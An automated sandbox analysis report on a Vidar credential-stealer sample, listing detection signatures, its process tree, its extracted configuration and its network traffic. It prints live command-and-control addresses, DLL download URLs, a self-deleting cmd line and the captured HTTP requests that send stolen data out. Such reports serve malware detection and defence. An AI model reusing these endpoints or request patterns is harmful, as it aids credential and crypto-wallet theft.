Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1443407
MD5: 75db6dfdebb9bf0d98acfc15f2219c62
SHA1: 5bc1ceec4269b4e893f2b00c1c4b3c0cb42a3291
SHA256: a2f94952c89ea440f82877365db5b4a5cf14a10e4168a22a92fce4a8fd98404f
Tags: exe
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Opens network shares
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 6352 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 75DB6DFDEBB9BF0D98ACFC15F2219C62)
    • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 1600 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • cmd.exe (PID: 7044 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 5392 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199686524322"], "Botnet": "9ed287469c3721fd5caf346580b2cf0d", "Version": "9.7"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security

Source | Rule | Description | Author | Strings
00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen
  • 0x221f0:$s1: JohnDoe
  • 0x31f80:$s1: JohnDoe
  • 0x221e8:$s2: HAL9TH
00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
Process Memory Space: file.exe PID: 6352 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security

Source | Rule | Description | Author | Strings
2.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
2.2.RegAsm.exe.400000.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen
  • 0x221f0:$s1: JohnDoe
  • 0x31f80:$s1: JohnDoe
  • 0x221e8:$s2: HAL9TH
2.2.RegAsm.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
2.2.RegAsm.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen
  • 0x20df0:$s1: JohnDoe
  • 0x20de8:$s2: HAL9TH
0.2.file.exe.ab0000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
                  No Sigma rule has matched
                  No Snort rule has matched

                  AV Detection

                  Source: file.exe | Avira: detected
                  Source: https://95.217.240.101/freebl3.dll | Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/nss3.dll | Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/sqlx.dll | Sophos S4: Label: malware repository uri
                  Source: https://95.217.240.101/softokn3.dlleS | Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/softokn3.dll | Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/msvcp140.dllsS9 | Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/freebl3.dllwT= | Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101 | Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/msvcp140.dll | Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/D | Avira URL Cloud: Label: malware
                  Source: https://t.me/k0mono | Avira URL Cloud: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199686524322/inventory/ | Avira URL Cloud: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199686524322/badges | Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/O | Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/sqlx.dll | Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/mozglue.dll | Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/sqlx.dllI | Avira URL Cloud: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199686524322 | Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/msvcp140.dllyS# | Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/vcruntime140.dll | Avira URL Cloud: Label: malware
                  Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199686524322"], "Botnet": "9ed287469c3721fd5caf346580b2cf0d", "Version": "9.7"}
                  Source: file.exe | Joe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004062A5 CryptUnprotectData,LocalAlloc,LocalFree,2_2_004062A5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00406242 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00406242
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004082DE memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,PK11_FreeSlot,lstrcat,2_2_004082DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040245C memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,2_2_0040245C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410DAC CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,2_2_00410DAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7C6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,2_2_6C7C6C80
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49719 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49731 version: TLS 1.2
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                  Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                  Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                  Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                  Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.dr
                  Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC5AC6 FindFirstFileExW,0_2_00AC5AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401162
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_004162AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_004153F6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040B463
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_004094E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040C679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00415AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_00409F72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040A981
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,2_2_00415E66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,2_2_00415843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                  Networking

                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199686524322
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199686524322 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 95.217.240.101 95.217.240.101
                  Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 5713Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /sqlx.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGDGHCBGDHJJKECAECBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 98013Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040514C _EH_prolog,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 2_2_0040514C
                  Source: global traffic HTTP traffic detected: GET /profiles/76561199686524322 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 Host: 95.217.240.101 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /sqlx.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 Host: 95.217.240.101 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 Host: 95.217.240.101 Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 Host: 95.217.240.101 Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 Host: 95.217.240.101 Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 Host: 95.217.240.101 Cache-Control: no-cache
